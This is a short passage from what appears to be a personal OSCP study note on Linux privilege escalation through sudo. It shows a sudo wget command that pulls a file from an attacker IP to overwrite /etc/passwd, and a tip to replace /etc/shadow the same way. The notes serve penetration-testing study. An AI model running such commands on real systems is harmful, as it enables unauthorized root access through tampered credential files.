nopadd/OSCP_Notes/Escalation/*nix/1_SUDO.md

 ```
 sudo wget [attacker IP]:[port]/passwd -O /etc/passwd
 ```
+  - Or substitute in /etc/shadow instead of /etc/passwd if the shadow file is used (which is likely).
 ## Apache
 Can't get a shell with this binary but can display file contents.
 ```